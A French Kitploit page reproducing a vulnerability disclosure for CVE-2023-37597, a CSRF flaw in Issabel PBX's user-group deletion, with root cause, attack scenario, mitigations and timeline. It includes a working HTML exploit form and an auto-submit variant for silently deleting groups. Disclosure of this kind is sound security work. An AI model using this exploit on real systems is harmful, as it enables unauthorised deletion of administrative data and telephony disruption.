Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 contient une vulnérabilité de Cross-Site Request Forgery (CSRF) dans sa fonctionnalité de gestion des groupes d'utilisateurs. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-37597
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 contient une vulnérabilité de Cross-Site Request Forgery (CSRF) dans sa fonctionnalité de gestion des groupes d'utilisateurs.

Voir le dépôt
11il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-37597 — issabel-pbx 4.0.0-6: Cross-Site Request Forgery (CSRF) — Suppression de groupe d'utilisateurs

Avertissement : Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée. N'utilisez pas cet exploit contre un système que vous ne possédez pas ou pour lequel vous ne disposez pas d'une autorisation écrite explicite de test.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Produit concerné
  • Analyse technique
  • Scénario d'attaque
  • Preuve de concept (PoC)
    • Étapes de reproduction
    • Code de l'exploit PoC
  • Impact
  • Atténuation et remédiation
  • Chronologie de la divulgation
  • Références
  • Auteur

Aperçu

issabel-pbx est une plateforme de communications unifiées (PBX) open source largement utilisée qui fournit des services VoIP, une gestion téléphonique et une administration web. La version 4.0.0-6 d'issabel-pbx contient une vulnérabilité de dans sa fonctionnalité de gestion des groupes d'utilisateurs.

Cross-Site Request Forgery (CSRF)

Un attaquant distant non authentifié peut créer une page HTML malveillante qui, lorsqu'elle est consultée par un administrateur authentifié, émet silencieusement une requête HTTP POST falsifiée pour supprimer n'importe quel groupe d'utilisateurs. Comme l'application ne valide pas l'origine des requêtes modifiant l'état à l'aide de jetons CSRF ou de politiques de cookies SameSite, le navigateur inclut automatiquement le cookie de session de l'administrateur, ce qui permet à la suppression de réussir sans que la victime en ait connaissance ou y consente.


Détails de la vulnérabilité

ChampValeur
Identifiant CVECVE-2023-37597
VulnérabilitéCross-Site Request Forgery (CSRF)
CWECWE-352 — Cross-Site Request Forgery (CSRF)
SévéritéMoyenne
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Version affectéeissabel-pbx 4.0.0-6
Date de divulgation10 juillet 2023
ChercheurSahil Ojha

Produit concerné

ChampValeur
Nom du produitissabel-pbx
Version4.0.0-6
ÉditeurIssabel Foundation
Page d'accueil de l'éditeurhttps://www.issabel.org/
Code sourcehttps://github.com/IssabelFoundation/issabelPBX
Testé surWindows (Burp Suite Community Edition)

Analyse technique

Qu'est-ce que le CSRF ?

Le Cross-Site Request Forgery (CSRF) est une attaque qui amène le navigateur d'une victime à envoyer une requête authentifiée à une application cible au nom de l'attaquant. L'attaque réussit lorsque :

  1. La victime dispose d'une session authentifiée active avec l'application cible.
  2. L'application s'appuie uniquement sur les cookies de session pour authentifier les requêtes (c'est-à-dire aucun jeton CSRF, aucune validation Origin/Referer, aucun attribut de cookie SameSite=Strict ou SameSite=Lax).
  3. L'attaquant peut prédire la structure de la requête modifiant l'état.

Cause racine

Le point de terminaison de suppression de groupe d'utilisateurs (/index.php?menu=grouplist) dans issabel-pbx 4.0.0-6 traite les requêtes HTTP POST qui contiennent uniquement l'action delete et un paramètre id_user. L'application ne fait pas ce qui suit :

  • Générer ou valider un jeton synchronisateur (anti-CSRF).
  • Vérifier les en-têtes HTTP Origin ou Referer.
  • Définir l'attribut SameSite sur les cookies de session.

Par conséquent, toute page web chargée dans le navigateur de la victime peut soumettre silencieusement le formulaire de suppression en utilisant la session existante de la victime, car le navigateur joindra automatiquement le cookie de session.

Point de terminaison vulnérable

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

Scénario d'attaque

  1. L'attaquant crée une page HTML malveillante contenant un formulaire masqué qui envoie la requête de suppression au panneau d'administration Issabel.
  2. L'attaquant livre la page à un administrateur Issabel authentifié — par e-mail d'hameçonnage, un lien dans un message de chat, ou une `` intégrée sur une page compromise.
  3. Le navigateur de la victime charge la page. JavaScript soumet automatiquement le formulaire, ou la victime est incitée par ingénierie sociale à cliquer sur un faux bouton « Submit ».
  4. Le serveur Issabel reçoit une requête POST valide avec le cookie de session de l'administrateur et supprime le groupe d'utilisateurs ciblé sans confirmation supplémentaire ni validation de jeton.
  5. Le groupe d'utilisateurs est définitivement supprimé, ce qui peut perturber le routage des appels, les contrôles d'accès et tous les utilisateurs qui dépendaient de ce groupe — provoquant ainsi un déni de service au niveau de l'application.

Preuve de concept (PoC)

Avertissement : Le PoC suivant est fourni strictement à des fins éducatives. Utilisez-le uniquement dans des environnements de laboratoire ou sur des systèmes pour lesquels vous disposez d'une autorisation explicite.

Étapes de reproduction

Étape 1 — Connexion au panneau d'administration Issabel

Accédez à la page de la liste des groupes d'utilisateurs et connectez-vous avec des identifiants d'administrateur.

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

Panneau d'administration — Liste des groupes d'utilisateurs


Étape 2 — Capture de la requête de suppression

Tentez de supprimer un groupe d'utilisateurs en faisant transiter le trafic par Burp Suite. Cliquez avec le bouton droit sur la requête POST capturée et sélectionnez Engagement Tools → Generate CSRF PoC pour générer le squelette HTML de l'exploit.

Burp Suite — Requête DELETE capturée


Étape 3 — Hébergement de la page d'exploit CSRF

Enregistrez le HTML généré dans un fichier (voir Code de l'exploit PoC ci-dessous). Hébergez-le sur un serveur contrôlé par l'attaquant, ou envoyez-le directement à la victime.


Étape 4 — La victime ouvre la page d'exploit

Lorsque l'administrateur authentifié ouvre l'URL de l'exploit ou y est redirigé, le formulaire masqué est soumis automatiquement (ou la victime clique sur le bouton leurre). Le groupe d'utilisateurs ciblé est supprimé du panneau d'administration.

Exploit soumis — groupe supprimé (avant)

Exploit soumis — groupe supprimé (après)


Code de l'exploit PoC

Le fichier HTML suivant (également disponible sous le nom CSRF exploit.html) démontre l'attaque. Remplacez {Issabel IP} par l'hôte cible et ajustez id_user pour qu'il corresponde à l'identifiant du groupe que vous souhaitez supprimer.

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Variante à soumission automatique : Pour éviter que la victime n'ait à cliquer sur quoi que ce soit, ajoutez ce qui suit à l'intérieur de la balise <body> afin que le formulaire soit soumis automatiquement au chargement de la page :

root@kitploit:~
<script>document.forms[0].submit();</script>

Impact

DimensionDescription
IntégritéUn attaquant peut supprimer silencieusement n'importe quel groupe d'utilisateurs depuis le panneau d'administration Issabel.
DisponibilitéLa suppression de groupes d'utilisateurs perturbe les règles de routage des appels, le contrôle d'accès et les services téléphoniques pour tous les utilisateurs appartenant à ces groupes, ce qui équivaut à un déni de service partiel.
ConfidentialitéNon directement affectée par cette vulnérabilité.

Atténuation et remédiation

Les administrateurs et les développeurs doivent appliquer les défenses suivantes :

  1. Mettre en œuvre des jetons CSRF (modèle de jeton synchronisateur)

    • Générez un jeton unique, imprévisible, par session (ou par requête) pour chaque formulaire modifiant l'état.
    • Validez le jeton côté serveur avant de traiter toute opération POST/PUT/DELETE.
  2. Définir l'attribut de cookie SameSite

    • Définissez les cookies de session avec SameSite=Lax (minimum) ou SameSite=Strict pour empêcher les requêtes cross-origin de transporter les identifiants de session.
    • Exemple d'en-tête de réponse : Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. Valider les en-têtes Origin et Referer

    • Côté serveur, rejetez les requêtes dont l'en-tête Origin ou Referer ne correspond pas au domaine de l'application elle-même.
  4. Exiger une ré-authentification pour les actions destructrices

    • Demandez à l'administrateur de confirmer son mot de passe avant de supprimer des groupes ou d'effectuer d'autres opérations destructrices.
  5. Appliquer une défense en profondeur

    • Utilisez une règle de pare-feu d'application web (WAF) pour bloquer les requêtes POST cross-origin inattendues vers les points de terminaison sensibles.

Chronologie de la divulgation

DateÉvénement
10 juillet 2023Vulnérabilité découverte et documentée par Sahil Ojha
10 juillet 2023Attribution de CVE-2023-37597
10 juillet 2023Divulgation publique

Références

  • NVD — CVE-2023-37597
  • OWASP — Cross-Site Request Forgery (CSRF)
  • OWASP CSRF Prevention Cheat Sheet
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Issabel Foundation — issabelPBX

Auteur

Sahil Ojha Chercheur en sécurité

Si vous avez trouvé cette recherche utile, n'hésitez pas à ⭐ mettre une étoile au dépôt.

Télécharger l’outil